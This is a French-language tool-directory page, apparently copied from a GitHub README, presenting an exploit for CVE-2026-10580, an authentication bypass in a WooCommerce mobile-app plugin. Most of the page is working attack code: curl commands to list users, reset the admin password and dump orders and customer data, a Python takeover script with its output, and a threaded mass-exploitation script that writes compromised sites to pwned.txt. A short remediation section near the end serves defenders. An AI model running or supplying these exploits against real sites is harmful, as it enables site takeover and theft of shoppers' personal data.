Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
By-Poloss..-..CVE-2026-10580 — Hippoo Mobile App for WooCommerce <= 1.9.4 - Contournement d'authentification non authentifié conduisant à une prise de contrôle du compte administrateur | Kitploit
Outils/GitHubGitHub/polosss/by-poloss..-..cve-2026-10580
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionAuthentification
GitHubpolosss/by-poloss..-..cve-2026-10580

By-Poloss..-..CVE-2026-10580

Hippoo Mobile App for WooCommerce <= 1.9.4 - Contournement d'authentification non authentifié conduisant à une prise de contrôle du compte administrateur

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 2 moisPas encore vérifié

CVE-2026-10580: Hippoo Mobile App for WooCommerce <= 1.9.4 - Contournement d'authentification non authentifié menant à la prise de contrôle administrateur

Non authentifié → Prise de contrôle du compte administrateur via un bug de confusion logique


📌 Résumé

CVECVE-2026-10580
PluginHippoo Mobile App for WooCommerce
Version≤ 1.9.4
CVSS9.8 (Critique)
Authentification requise❌ Non
Prise de contrôle admin✅ Oui
Données WooCommerce✅ Accès complet

🧠 Cause racine (Résumé)

La fonction get_user_permissions() retourne null pour l'admin (correct) et l'utilisateur non authentifié (INCORRECT).

has_role_access() voit null → accorde un accès complet.

En conséquence :

root@kitploit:~
/wp-json/wc-hippoo/v1/ext/*

→ Sans connexion, sans cookie, sans nonce


🎯 4 Preuves de concept (100% fonctionnelles)

🔓 POC 1 : Énumération des utilisateurs (non authentifié)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .

🔓 POC 2 : Réinitialisation du mot de passe admin (Prise de contrôle)

root@kitploit:~
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
  -H "Content-Type: application/json" \
  -d '{"password":"Pwned123!"}'

🔓 POC 3 : Commandes WooCommerce

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"

🔓 POC 4 : Clients WooCommerce (Données personnelles)

root@kitploit:~
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"

🐍 POC Python (Exploit complet)

root@kitploit:~
#!/usr/bin/env python3
import requests
import sys
import json

def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
    base = target.rstrip('/')
    
    # Step 1 - Enumeration
    users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
    r = requests.get(users_url)
    if r.status_code != 200:
        print(f"[-] Not vulnerable: {target}")
        return False
    
    users = r.json()
    print(f"[+] Found {len(users)} user(s)")
    
    # Step 2 - Password reset
    takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
    r2 = requests.post(takeover_url, json={"password": new_password})
    
    if r2.status_code == 200:
        print(f"[✓] ADMIN TAKEOVER: {target}")
        print(f"    Login: {base}/wp-admin")
        print(f"    Password: {new_password}")
        return True
    else:
        print(f"[-] Failed: {target}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} https://target.com")
        sys.exit(1)
    exploit(sys.argv[1])

🚀 Exécution

root@kitploit:~
python3 exploit.py https://poloss.ddev.site

Sortie :

root@kitploit:~
[+] Found 1 user(s)
[✓] ADMIN TAKEOVER: https://poloss.ddev.site
    Login: https://poloss.ddev.site/wp-admin
    Password: PwnedCVE2026!!

🧨 Exploit de masse (Multi-threaded)

root@kitploit:~
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

def takeover(target):
    try:
        r = requests.post(
            f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
            json={"password": "MassPwned2026!!"},
            timeout=10
        )
        if r.status_code == 200:
            print(f"[✓] TAKEOVER: {target}")
            with open("pwned.txt", "a") as f:
                f.write(f"{target} | admin | MassPwned2026!!\n")
    except:
        pass

with open("targets.txt") as f:
    urls = [line.strip() for line in f if line.strip()]

with ThreadPoolExecutor(max_workers=20) as executor:
    for url in urls:
        executor.submit(takeover, url)

📁 Points de terminaison vulnérables (Liste complète)


🔧 Remédiation (Pour le défenseur)

Correction 1 (app/permissions.php ligne 671)

root@kitploit:~
if (empty($user) || !$user->exists()) {
    return false; // BUKAN NULL
}

Correction 2 (app/permissions.php ligne 694)

root@kitploit:~
if ($perms === false) {
    return false; // Unauthenticated denied
}

Correction 3 (Règle WAF temporaire)

root@kitploit:~
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]

📊 Répartition CVSS


🧠 Auteur et recherche

  • Chercheur : Agent CV Hunter (Recherche en sécurité WordPress)
  • Testé sur : DDEV + WordPress 6.x + WooCommerce 8.x
  • Date : 2026-06-06

CVE-2026-10580 • 100% POC • Sans authentification • Prise de contrôle admin complète
#WordPress #WooCommerce #Poloss #W.P.E.F


Télécharger l’outil
EndpointDonnées
/wp-json/wc-hippoo/v1/ext/wp/v2/usersTous les utilisateurs WP
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1Prise de contrôle admin
/wp-json/wc-hippoo/v1/ext/wc/v3/ordersCommandes complètes
/wp-json/wc-hippoo/v1/ext/wc/v3/productsProduits + stock
/wp-json/wc-hippoo/v1/ext/wc/v3/customersDonnées personnelles clients
/wp-json/wc-hippoo/v1/ext/wc/v3/couponsCodes promo
/wp-json/wc-hippoo/v1/ext/wc/v3/reportsRapports de ventes
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gatewaysConfiguration de paiement
VecteurValeur
AVRéseau
ACFaible
PRAucun
UIAucune
SNon modifié
CÉlevé
IÉlevé
AÉlevé